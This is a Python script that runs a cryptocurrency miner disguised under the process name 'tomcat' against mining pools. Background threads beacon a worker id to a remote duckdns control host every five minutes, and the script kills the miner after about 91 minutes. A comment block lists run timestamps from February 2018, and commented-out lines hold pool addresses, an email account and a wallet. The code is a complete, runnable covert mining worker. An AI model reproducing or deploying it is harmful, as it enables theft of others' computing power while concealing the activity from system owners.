import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:08.260200
#2018-02-17 16:28:04.350863
#2018-02-17 18:16:04.976661
#2018-02-17 20:02:07.487719
#2018-02-17 21:50:07.293980
#2018-02-17 23:34:01.397117
#2018-02-18 01:23:04.240136
#2018-02-18 03:10:04.244181
#2018-02-18 04:57:04.867323
#2018-02-18 06:48:01.312239
#2018-02-18 08:36:06.616183
#2018-02-18 10:22:02.031233
#2018-02-18 12:08:01.945090
#2018-02-18 13:53:04.768797
#2018-02-18 15:42:07.594361
#2018-02-18 17:32:01.590082
#2018-02-18 19:18:05.659799
#2018-02-18 21:04:04.292618
#2018-02-18 22:51:04.967463
#2018-02-19 00:39:01.976589
#2018-02-19 02:24:05.778529
#2018-02-19 04:10:08.955113
#2018-02-19 05:54:01.300506
#2018-02-19 07:42:10.691128
#2018-02-19 09:32:01.457110
#2018-02-19 11:22:05.010867
#2018-02-19 13:09:07.394650
#2018-02-19 14:56:09.388685
#2018-02-19 16:44:01.873889
#2018-02-19 18:31:05.420420
#2018-02-19 20:17:06.388937
#2018-02-19 22:06:01.874758
#2018-02-19 23:52:01.709008
#2018-02-20 01:38:07.640853
#2018-02-20 03:26:07.813980
#2018-02-20 05:13:01.736524
#2018-02-20 06:55:07.080587
#2018-02-20 08:42:01.760571
#2018-02-20 10:26:01.276194
#2018-02-20 12:10:08.694537
#2018-02-20 13:59:03.879836
#2018-02-20 15:43:06.946225
#2018-02-20 17:29:05.278560
#2018-02-20 19:18:02.171414
#2018-02-20 21:06:05.772598
#2018-02-20 22:51:01.731288
#2018-02-21 00:32:07.300975
#2018-02-21 02:17:06.000387
#2018-02-21 04:04:07.422872
#2018-02-21 05:51:04.999060
#2018-02-21 07:39:04.219256
#2018-02-21 09:23:06.246654
#2018-02-21 11:11:09.345514
#2018-02-21 12:59:05.245766
#2018-02-21 14:46:08.364278
#2018-02-21 16:34:01.323195
#2018-02-21 18:24:02.105966
#2018-02-21 20:08:07.065085
#2018-02-21 21:57:07.618176
#2018-02-21 23:46:05.716284
#2018-02-22 01:35:05.895466
#2018-02-22 03:22:07.746674
#2018-02-22 05:09:04.197388
#2018-02-22 06:52:08.493461
#2018-02-22 08:41:02.047082
#2018-02-22 10:28:04.309550
#2018-02-22 12:13:08.145418
#2018-02-22 13:58:11.365613
#2018-02-22 15:47:01.873220
#2018-02-22 17:33:09.700073
#2018-02-22 19:19:08.629609
#2018-02-22 21:12:07.172733
#2018-02-22 22:57:01.592797
#2018-02-23 00:43:04.820882
#2018-02-23 02:31:04.202112
#2018-02-23 04:19:01.770577
#2018-02-23 06:05:07.203685
#2018-02-23 07:49:07.340047
#2018-02-23 09:49:06.689076
#2018-02-23 11:54:01.567975
#2018-02-23 13:44:08.282377
#2018-02-23 15:33:09.559277
#2018-02-23 17:21:01.824199
#2018-02-23 19:06:03.941915
#2018-02-23 20:54:08.036099
#2018-02-23 22:40:09.983319
#2018-02-24 00:28:07.197976
#2018-02-24 02:20:02.487296
#2018-02-24 04:09:06.784727
#2018-02-24 05:57:03.599136
#2018-02-24 07:46:07.552818
#2018-02-24 09:33:03.619075
#2018-02-24 11:27:01.812146
#2018-02-24 13:17:01.919416
#2018-02-24 15:08:04.409482
#2018-02-24 16:57:03.848156
#2018-02-24 18:45:08.402111
#2018-02-24 20:36:05.385646
#2018-02-24 22:40:08.203323
#2018-02-25 01:47:04.933651
#2018-02-25 05:07:01.657839
#2018-02-25 10:22:01.385809